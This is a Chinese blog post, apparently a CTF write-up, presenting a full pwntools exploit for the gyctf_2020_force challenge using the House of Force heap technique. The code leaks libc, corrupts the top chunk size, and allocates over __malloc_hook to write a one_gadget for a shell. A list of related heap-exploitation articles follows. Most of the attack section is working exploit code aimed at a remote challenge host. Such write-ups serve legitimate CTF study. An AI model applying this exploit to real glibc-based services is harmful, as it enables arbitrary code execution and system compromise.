2. 程式人生 > 實用技巧 >gyctf_2020_force | House of force

gyctf_2020_force | House of force

阿新 發佈:2020-12-14

House of force 算是比較容易理解的堆利用手法,本題主要是一個裸的 HOF,但是因為各種各樣的錯誤調了整整兩個晚上才在打通,身心俱疲,有點喪失繼續學 pwn 的信心了,還是記錄一下

EXP

libc 是我本地帶符號表的

from pwn import *
libc_path = '/home/harvey/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so'
ld_path = '/home/harvey/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/ld-2.23.so'
elf_path = './gyctf_2020_force'
#r = process([ld_path, elf_path], env={"LD_PRELOAD":libc_path})
r = remote('node3.buuoj.cn', '29681')
context.log_level = 'debug'
elf = ELF(elf_path)
libc = ELF(libc_path)
gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

def add(size, content):
    r.sendlineafter('2:puts', '1')
    r.sendlineafter('size', str(size))
    r.recvuntil('bin addr ')
    addr = int(r.recvuntil('\n')[:-1], 16)
    r.sendlineafter('content', content)
    return addr

def show(idx):
    r.sendlineafter('2:puts', '2')

def debug():
    gdb.attach(r)
    pause()

addr = add(1000000, 'aaaa')
success('malloc addr -> ' + hex(addr))
pay = 'a'*0x10 + p64(0) + p64(999999999999)
libc_base = addr - 0x6fa010
realloc = libc_base + libc.symbols['__libc_realloc']
success('addr - >' + hex(realloc))
success('libc_base ->' + hex(libc_base))
pay = 'a'*0x10 + p64(0) + p64(0xffffffffffffffff)
top_chunk = add(0x18, pay) + 0x10
success('top chunk -> ' + hex(top_chunk))
target = libc_base + libc.symbols['__malloc_hook'] - top_chunk - 0x33
pay = p64(0) + p64(libc_base + gadget[1]) + p64(realloc+0x10)
add(target, 'a'*0x8)
add(0x10, pay)
r.sendlineafter('2:puts\n', '1')
r.sendlineafter('size\n', str(0x40))
r.interactive()

相關推薦

gyctf_2020_force | House of force

House of force 算是比較容易理解的堆利用手法,本題主要是一個裸的 HOF,但是因為各種各樣的錯誤調了整整兩個晚上才在打通,身心俱疲,有點喪失繼續學 pwn 的信心了,還是記錄一下

字串shellcode在house of force中的運用

實驗環境 Ubuntu18.04,glibc-2.27 背景介紹 1、Houseofforce是利用早期glibc庫進行堆分配時存在的缺陷,從而對記憶體進行任意寫的攻擊方式。當初次申請堆塊時,程式會對映一塊較大的chunk作為topchunk,之後再進行

House of Force

House of Force 0x00 原理介紹 當申請的chunk足夠大,glibc在tcache和bins中都找不到匹配大小的時候,就會對top chunk進行分割,取出合適大小 、進行分配。House of Force作為一種堆利用方式,關鍵是利用溢位漏洞對t

house of orange 原始碼分析

目錄前言分析內容來源 前言 原來只知道 house of orange 打 unsorted bin ,碰到題目發現還可以打 fast bin ,今天就具體研究一下原始碼(glibc-2.23)。

pwn-EasyHeap(House of spirit)

checksec看防護: 部分rel,說明got劫持可行 create: edit: delete: 題目有後門函式但buu環境無法利用,所以要通過House of Spirit偽造chunk getshell

House of Lore

原理 /* If a small request, check regular bin.Since these \"smallbins\" hold one size each, no searching within bins is necessary.

glibc2.29以上 IO_FILE 及 house of pig

擺爛很長時間之後,終於下定決心來看點新的東西。正好 winmt 師傅前不久把他 pig 修好的附件發給我了,我就藉此來學習一下新版本的 IO_FILE 及 house of pig。

PWN學習之house of系列(一)

作者:Hcamael@知道創宇404實驗室 發表時間:2018年1月31日 準備一份house of系列的學習博文,在how2heap上包括下面這些:

Gym 102055B Balance of the Force

https://blog.csdn.net/lalalafloat/article/details/103056764?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163635050916780255222938%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255F

英國獨立遊戲工作室Force of Habit宣佈無限期停業

開發了《吐司時間》的英國獨立遊戲工作室Force of Habit宣佈即將進入無限期停業狀態。

Sentinel Getting Started And Integration of Spring Cloud Alibaba Tutorials

原文連結:Sentinel Getting Started And Integration of Spring Cloud Alibaba Tutorials Sentinel Getting Started And Integration of Spring Cloud Alibaba Tutorials

A Tour of Go---Go語言之旅

序言 開始翻譯一下GO的官方網站的:A Tour of Go(Go語言的不歸之旅) 學習A Tour of Go的前置步驟

解決大於5.7版本mysql的分組報錯Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggregated

原因:    MySQL 5.7.5和up實現了對功能依賴的檢測。如果啟用了only_full_group_by SQL模式(在預設情況下是這樣),那麼MySQL就會拒絕選擇列表、條件或順序列表引用的查詢,這些查詢將引用組中未命名的非聚合列,而不

Pytorch GPU視訊記憶體充足卻顯示out of memory的解決方式

今天在測試一個pytorch程式碼的時候顯示視訊記憶體不足,但是這個網路框架明明很簡單,用CPU跑起來都沒有問題,GPU卻一直提示out of memory.

MySQL登入提示:host *.*.*.* is blocked because of many connection errors

登入myslq提示 host ... is blocked because of many connection errors;unblock with ‘mysqladmin flush-hosts’

詳解Pycharm出現out of memory的終極解決方法

最近在跑程式,然後Pycharm就跳出out of memory 的錯誤提示,可能是由於讀取的資料太多導致的,Pycharm有一個預設記憶體的最大容量上線,跳出提示的是1024M,也就是分配給Pycharm的內記憶體不夠啦!

js中forEach,for in,for of迴圈的用法示例小結

本文例項講述了js中forEach,for in,for of迴圈的用法。分享給大家供大家參考,具體如下:

抽象類為什麼可以有建構函式?- Constructor of an abstract class in C#(轉載)

問 Why is it possible to write constructor for an abstract class in C#?As far as I know we can‘t instantiate an abstract class.. so what is it for?You can‘t instantiate the class,right?

visual studio (window10) dark主題下修改游標粗細 (visual studio change the thickness of the cursor in dark theme for window10)

本人電腦配置:window10系統, Microsoft Visual Studio 2019 本來在visual studio中設定了 dark 的主題,想說使電腦亮度小點,但是發現游標強度太小,經常看不到,既浪費了尋找游標的時間,又不利於眼睛,所以上網

js實現文章目錄索引導航(table of content)

什麼叫TOC呢?table of content。 具體什麼效果呢?可以隨便找個hexo部落格中體驗一下,例如這個。